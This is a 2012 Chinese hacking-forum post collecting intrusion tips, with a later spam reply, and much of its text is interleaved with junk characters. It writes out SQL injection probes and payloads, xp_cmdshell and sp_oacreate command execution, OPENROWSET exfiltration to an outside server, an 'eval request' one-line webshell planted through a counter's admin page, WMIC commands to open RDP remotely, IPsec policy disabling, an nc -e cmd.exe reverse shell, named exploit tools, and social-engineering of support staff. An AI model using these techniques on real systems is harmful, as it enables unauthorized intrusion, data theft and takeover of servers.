找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3338|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
+ t8 [8 N# n9 H& |$ o
% m, f3 O6 }+ P% U: f" }# h! K. Q+ |& W+ ]- H
SA点数据库分离搞法+语句:7 i. E. q, s- f" a" l( o. W

3 }  s  u  }7 p) q9 O1 n9 W! L  k注射点不显错,执行下面三条语句页面都返回正常。' o: A- y' O$ d, L, c
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')% ~/ c0 O; b* e0 Y% E. B& w) L7 e
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask'); a6 z1 ^2 t% F6 X
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
9 {" k8 \" D, B1 u/ D3 j. e! B可以列目录,判断系统为2000,web与数据库分离
7 U; Q# Q! |% }$ j遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。6 b2 k/ M6 G: @
在注射点上执行! c  y; Q- D4 p0 ~4 h
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
' |% _* I5 U1 ]. [页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP' ^. p8 U0 E; g9 D
还有我用NC监听得其他端口都没有得到IP。
% c/ O2 x9 C4 e8 R/ X
* }! Z, p( t# K+ f9 b5 Q( y2 I通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。  ]: z9 A% `5 n+ d( `+ |
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--8 ~# F& |& X7 r0 u' W, ~4 w$ l
5 a. S1 [$ z3 _( Q9 }* W
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--" C+ R" ?0 Q* U" _& o" Q0 j; m
9 n) y7 D- @, V! _) g3 ?  l8 T6 q
现在就猜想是不是数据库是内网而且不能连外网。
- h; I" M. _  W, w. u5 R
- Q. t4 n, Q4 E. a) B9 I- ]) D6 ?
9 e3 E9 Z& u- J4 W4 G# a( Jaccess导出txt文本代码! o3 G' F5 `8 g" Z
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin" R% {6 `& ]. W$ U! t0 t! b/ q
9 ?! h" |- n: c6 o! i( y

9 {5 t* K" d& [# v
$ l0 H# y6 V( M4 d自动跳转到指定网站代码头3 F; m* [* Q' X$ h
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
) N6 Z5 N" P( p1 M% |( r& y$ V. d8 d4 s
* p! `. f; L, J8 [+ R# ?& j
入侵java or jsp站点时默认配置文件路径:" {& W8 G5 y7 H! ?. z5 d0 p- T
\web-inf\web.xml
' R! B" e1 X! b1 C7 X6 ]4 |9 Y0 U, y1 wtomcat下的配置文件位置:0 r! ~  H# L; s6 Q
\conf\server.xml            (前面加上tomcat路径)
2 w1 ]& J! O% @! I\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
" W7 j8 k1 Y8 e" V$ x! G* m# ~
4 ?+ j! v& q! x# ^2 n/ l7 v# G6 _( K; Z2 H

$ H/ v5 D. O8 C+ S7 g$ d5 O! q检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
" O( j& @) y- {9 B-1%23
5 x8 Y9 ?8 J! F* d, }> 9 E; d/ W$ B8 a# `6 {2 V
<5 K# j) Q2 B$ V/ L; [, z, C
1'+or+'1'='10 f* V) t4 {& a" r: m9 q, O4 a6 s
id=8%bf  s  s! N  `1 F: q

# G, `- R' Z* f+ {0 k, O* p全新注入点检测试法:
7 C3 R) V! p  ?在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。. m) V4 h+ r/ w6 M1 U

# J, [( z: \" H5 i5 w( v在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
0 Z: n) v: P7 E( C- E3 q2 G; A( g& @9 L1 B, E3 B
搜索型注入判断方法:# |: h' f" J' d5 E( V6 _
北京%' and '1'='1' and '%'='
! D' Y/ P9 J. Q9 A  w$ s北京%' and '1'='2' and '%'='
* G4 X8 G4 P, B& i- B( n- w4 k+ w4 u) f  a" G3 d
' p2 @0 f+ X2 a3 n* L
COOKIES注入:
! u& ]9 s, N9 g6 V; v0 W% R7 ~' G( G+ Q
javascript:alert(document.cookie="id="+escape("51 and 1=1"));0 t& t3 G: E) N. E' o! S; R
# B0 `9 d3 f( O+ y2 r% U; p
2000专业版查看本地登录用户命令:0 J- q+ Z+ x" S; S4 S, a
net config workstation
6 d4 `: |" c, o, L' t1 H8 S7 C; [& d0 X  l# I  E; A0 _3 ~6 q

, p; ~, ?: B/ b- k2 z: J2003下查看ipsec配置和默认防火墙配置命令:6 }0 A* E( O4 i
netsh firewall show config
! r/ J4 P1 z5 H" ?+ unetsh ipsec static show all
+ ~6 a) e- [+ E% ]$ A4 T$ h; w/ Y3 y& w/ b+ A, J! r! Z" H
不指派指定策略命令:
* M. Z! q% U: h, pnetsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
% @! ?8 u! c# a1 L$ |netsh ipsec static show policy all  显示策略名4 C; x  O, E0 z1 J9 }: j  |
: l/ W8 T3 P4 T

* w; J9 P" k  z" Y9 n. P猜管理员后台小技巧:* j# F8 ]) ~. O" ?: {
admin/left.asp
& c( V! r' d. Y% x' t& iadmin/main.asp
) s, Z# {' f+ a5 b. Uadmin/top.asp, z4 x3 n* u9 Y4 N5 k* K8 E
admin/admin.asp
4 l6 r6 g" j5 O6 z# x+ }会现出菜单导航,然后迅雷下载全部链接
, c% C- |* I1 P' M4 b% c0 Z8 w
- Z; {. B* p/ ?) D  S
6 {" I# m* f+ }: V1 S% c$ D社会工程学:+ ?% f6 c' |' G* p( c4 _
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人. E/ u+ _" z5 u
然后去骗客服
1 g) Q% @9 k) r6 T
/ A- ?8 |; I$ |$ W5 M6 `8 X2 P
4 r' m8 ^; \% g. V统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
6 w, J2 p, L9 X5 u: S6 X8 X/ `2 N查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
. y; _% a6 |, p' U; ?  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。+ ^0 ]6 |  G) F" |) |" S; S
" Y2 f* O: V& S6 H) O5 y! P
8 _6 N" [! m. ?6 d9 l( n
% _/ r, G& K& [5 Y5 G
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)( O( f( ]. ~' @. @  T4 w

! Y7 [3 \1 H6 P. A+ Q+ C( x8 ^
6 a3 x# a0 @9 {. `3 ~3 N' b7 O& \) D$ D; S/ U7 \, R! Y
CMD加密注册表位置0 Z% y% N& z8 F
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor% V6 O8 Y  Z. ^* P$ S0 J$ H  i
AutoRun
3 c# \. B7 e2 y! e
) E3 ?- J$ b/ f2 j2 D4 ?(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor: _0 `1 M* n2 p4 ^  s
AutoRun8 E. F. \' B2 |, ?

0 V* S9 b9 [) B9 D1 W% k! V
0 |. p6 C  f) m, n; A在找注入时搜索Hidden,把他改成test0 r' M7 ~' y! w7 O. w% q$ @% R( A) |
$ N2 y. C& m. Y/ T2 N9 d: I' Q# w
; Z' M" w2 u2 _/ x+ _3 j# V
8 ~+ ~% V4 X7 k" U# a5 ?
mstsc /v:IP /console
% c* D9 s4 Y' Q
% w  U/ a* r5 q/ }! R9 _0 ~
7 p% j( G+ l+ G% q) N2 e) z  V一句话开3389:" f: W7 H6 V# Z7 r4 n

/ |& \# ?$ D$ G- l- P- Q最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
. }& k; G% P4 v& e( e0 H8 x3 X, n. ~: w开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.% R: D  c! }. u# N# ?- ~

7 Y. ~9 u- x- [$ \/ ^% {- p
  ~/ E" y/ Y- S: ]7 |* q知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:2 e" X) m2 I; F- M( X
Insert into admin(user,pwd) values('test','test')/ L/ ~3 n* z& r; j

. x& ]1 ]6 f- j6 G; E2 c
6 j: E. v* o( n! [* w2 hNC反弹- Y+ [8 ~5 d1 m# L! M. z  G$ _
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   : y9 t! O+ e) [) J  M6 J2 L
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)3 v6 Z' E, |# n% J* R3 D
# j* y* f0 D$ G4 x6 a: }7 |

/ V7 v! I- c7 J; l! A6 e( w在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
1 r- z4 Y3 R; \; }: I1 ~2 k9 D$ b2 X5 o- [' \4 G
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录( a* S5 C: h. }3 \' \
例如:, M: J7 X4 {) H; |8 x- u
subst k: d:\www\ 用d盘www目录替代k盘& c0 M4 {  Y: ]) G/ E. c
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表